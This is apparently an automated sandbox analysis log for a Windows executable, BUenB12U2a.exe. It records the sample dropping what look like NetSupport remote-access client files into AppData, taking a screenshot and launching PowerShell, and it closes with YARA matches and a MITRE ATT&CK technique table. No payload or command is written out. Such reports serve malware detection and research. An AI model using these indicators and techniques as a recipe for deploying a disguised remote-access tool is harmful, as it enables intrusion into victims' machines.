                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\_bz2.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\_lzma.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\select.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\_queue.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\_hashlib.pyd VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\certifi VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\unicodedata.pyd VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\psutil VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\psutil\_psutil_windows.pyd VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imaging.cp311-win_amd64.pyd VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\build.zip VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted\client32.exe VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted\client32.ini VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLL VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted\msvcr100.dll VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted\nskbfltr.inf VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted\NSM.LIC VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted\pcicapi.dll VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLL VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLL VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLL VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dll VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingmath.cp311-win_amd64.pyd VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Roaming\screenshot.png VolumeInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\certifi\cacert.pem VolumeInformation
                                Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_6CD26930 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree
Source: C:\Users\user\Desktop\BUenB12U2a.exe Code function: 0_2_00007FF76CA1D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_6C9979B0 GetVersionExA,GetUserNameA
Source: C:\Users\user\Desktop\BUenB12U2a.exe Code function: 0_2_00007FF76CA35C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation
Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_10702410 CreateEventA,GetLastError,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,GetVersionExA,wsprintfA,wsprintfA,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA
Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_10703240 CapiListen
Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_6C998F80 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,LeaveCriticalSection,GetTickCount,InterlockedExchange
Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_6CD0C4C0 __CxxThrowException@8,__CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError
Source: Yara match, File source: Process Memory Space: BUenB12U2a.exe PID: 6284, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: client32.exe PID: 3452, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: client32.exe PID: 1868, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLL, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dll, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLL, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\extracted\pcicapi.dll, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLL, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\extracted\client32.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLL, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 Input Capture | 12 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 Defacement |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Valid Accounts | 1 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 11 Access Token Manipulation | 4 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | 22 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
